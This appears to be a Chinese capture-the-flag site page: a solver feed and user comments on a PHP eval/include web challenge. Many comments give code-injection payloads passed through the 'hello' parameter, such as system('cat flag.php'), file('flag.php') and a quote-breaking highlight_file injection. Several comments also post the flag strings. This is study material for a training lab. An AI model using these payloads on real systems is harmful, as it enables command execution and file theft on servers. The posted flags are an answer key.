评分(10)
解题动态
柒柒77 攻破了该题 14分钟前
zz0607 攻破了该题 17分钟前
gongyy 攻破了该题 46分钟前
巴咕噜182 攻破了该题 2小时前
SurPLus007 攻破了该题 2小时前
zhaowenxin 攻破了该题 7小时前
yang0000 攻破了该题 16小时前
Biscuitvv 攻破了该题 16小时前
香蕉君 攻破了该题 19小时前
四叠半神话大系 攻破了该题 21小时前
lnboxue 攻破了该题 21小时前
chi 攻破了该题 22小时前
aboic 攻破了该题 1天前
youbug 攻破了该题 1天前
YYYYHHHHNNNN 攻破了该题 1天前
lance 攻破了该题 1天前
彭彭 攻破了该题 1天前
qwaeawd 攻破了该题 1天前
zzuer 攻破了该题 1天前
评论
我爱你制杖 2年前
举报
解题思路: 1.利用eval()函数可将函数中的参数当作php代码执行,故可通过命令执行漏洞system()函数去查看当前目录中的内容(如本题:?hello=system(".")来查看,获得flag.php文件名) 2.利用file()函数读取flag.php文件内容(如本题:?hello=file("flag.php"),需注意此处存在var_dun
五无心惘然 2年前
举报
flag{78096610f3a54eda62265ae8d6835aab}
18244914085 2年前
举报
直接使用system查看包含的文件flag.php, eval执行变量$a ?hello=system('cat flag.php | base64')
Lsec 2年前
举报
1:?hello=file('flag.php') 2:?hello=);highlight_file('flag.php');var_dump( 3:?hello=eval(system('cat flag.php | base64'))
你呀你ii 2年前
举报
?hello=eval(system('cat flag.php | base64'))
baianquanzu 2年前
举报
?hello=system('sort flag.php')
xlxlxl 2年前
举报
?hello=system('cat flag.php')
凉情梦回 2年前
举报
?hello=system('cat flag.php')
liu666 2年前
举报
flag{930e51a7a500775093c95aae8b67e404}
userdong 2年前
举报
?hello=system('cat flag.php')
riacky 2年前
举报
?hello=system('cat flag*')
hhthht 2年前
举报
flag{cea9de710e2926a7c49f12318caf3912}
ryan777 2年前
举报
根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')
AmazingForself 2年前
举报
看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539
ryl123569 2年前
举报
?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}
xiaobaiermei 2年前
举报
这里应该算的上是个文件包含吧